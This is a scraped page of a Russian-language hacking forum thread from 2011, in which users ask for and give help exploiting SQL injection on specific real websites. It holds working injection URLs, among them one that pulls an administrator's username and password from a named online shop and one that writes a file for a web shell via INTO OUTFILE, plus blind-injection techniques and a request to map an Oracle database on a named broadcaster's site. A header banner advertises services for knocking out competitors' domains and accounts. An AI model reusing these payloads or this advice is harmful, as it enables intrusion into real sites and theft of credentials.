УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1805 из 2438

1805

Опции темы

Поиск в этой теме

Опции просмотра

#18041

02.09.2011, 12:29

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

Цитата:

Сообщение от gh0stface

gh0stface said:
podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+
ili kak voobshe delat create table cherez injekciu, zaranee spasibo

Через инъекцию в MySQL - нельзя! Можно только в MSSQL инъекции.

#18042

02.09.2011, 16:20

gh0stface

Guest

Сообщений: n/a

Провел на форуме:
657

Репутация: 0

pomogite plz eshe s takoi situaciei:

esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:

site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+

#18043

02.09.2011, 16:36

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от gh0stface

gh0stface said:
pomogite plz eshe s takoi situaciei:
esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:
site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+

количество полей, используемых в запросе требуется найти для составления самого запроса, собственно. чтобы для сервера он был верным. в случае с INTO OUTFILE не нужно искать только принтабельные поля, т.к. мы вводим данные, а не выводим и можем сделать это через любое поле.

#18044

03.09.2011, 17:29

sourcec0de

Guest

Сообщений: n/a

Провел на форуме:
10040

Репутация: 7

Цитата:

Сообщение от Qwert321

Qwert321 said:
Подскажите плз. При вставке квадратных скобок, начинает выдавать( я так понял тип запроса) Array - www.magazin.seti.ee/modules/Board/recherche.php?action=1&terme[] , а когда вписываешь %00 в скобки, то вообще запрос выдает нулевое. запрос делается по типу ...&terme="query" ...как раскрутить багу?

Логин и пасс админа.

Код:

Code:
http://www.magazin.seti.ee/modules/Board/index.php?pa=view&cid=78+limit+0+union+select+1,2,uname,pass,5,6,7,8,9,10,11+from+m_seti_users+limit+0,1%23

#18045

03.09.2011, 22:06

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Я пожалуй процитирую первый пост:

Цитата:

Сообщение от None

В этой и только в этой теме вы можете задать вопрос
про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках
(для остального есть поиск по форуму)
.
Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.
Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется

Здесь не центр первой помощи, и если кто-то хочет найти статью, мануал, фак, видео, заметку ЮЗАЙТЕ ПОИСК!

Здесь не школьный кабинет, в котором вам будут разжевывать детально как что-то использовать, ВАМ МОГУТ ПОМОЧЬ, но за вас НИКТО НИЧЕГО ДЕЛАТЬ НЕ БУДЕТ И НЕ ДОЛЖЕН.

Обращусь к людям кто отвечает на вопросы, я лично Вам очень благодарен, прекрасно понимаю, что значит грамотно и правильно объяснить задающему вопрос, ответ так, что бы он понял, но пожалуйста, повторюсь, пожалуйста, не решайте их проблемы за них, натолкните их на мысль, на правильное направление, но не давайте НИКОМУ готовых решений, потому, что люди этим пользуются, и не понимают, что они делают, и потом каждый раз приходят в эту тему и умоляют что бы за них кто-то подумал и сделал.

Обращусь к людям кто задает вопрос, будьте так любезны. перед тем как задать вопрос, используйте поиск по форуму, пробегитесь глазами по заголовкам прикрепленных тем, в большинстве случаев ответ на ваш вопрос уже дан, даже поговорка есть "семь раз отмерь, один отрежь", и действительно лучше самому семь раз подумать, и решить проблему, тем самым повысив свой боевой скил, чем каждый раз спрашивать одно и тоже.

#18046

03.09.2011, 23:24

LamerHacker

Guest

Сообщений: n/a

Провел на форуме:
1931

Репутация: 0

Помогите понять, в чем причина ошибки?

Так инъекция срабатывает

http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*

но если подставить select перед user()

http://site.ru/index.php?a=50+and+1=if(ascii(substring((SELECT user()),1,1))>=100,1,0)/*

то выдает ошибку

Цитата:

Сообщение от None

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

Может из-за версии mysql 3.23.44 ?

#18047

03.09.2011, 23:49

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от LamerHacker

LamerHacker said:
Помогите понять, в чем причина ошибки?
Так инъекция срабатывает
http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*
но если подставить
select
перед
user()
http://site.ru/index.php?a=50+and+1=if(ascii(substring((
SELECT
user()),1,1))>=100,1,0)/*
то выдает ошибку
Может из-за версии mysql 3.23.44 ?

Потому что (SELECT user()) будет является подзапросом, которые появились с версии 4.1. Так что да, ты прав, дело в версии.

#18048

04.09.2011, 01:39

LamerHacker

Guest

Сообщений: n/a

Провел на форуме:
1931

Репутация: 0

Спасибо

Из-за версии не получается так же подставить UNION SELECT

Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?

#18049

04.09.2011, 01:52

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от LamerHacker

LamerHacker said:
Спасибо
Из-за версии не получается так же подставить
UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?

посимвольный брут

#18050

05.09.2011, 20:51

Faaax

Guest

Сообщений: n/a

Провел на форуме:
124363

Репутация: 11

есть скуля

Код:

Code:
http://www.vgtrk.com/rnews.html?sid=86&id=4716

стоит oracle

подскажите как вывести таблицы и колонки?

Страница 1805 из 2438

1805

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход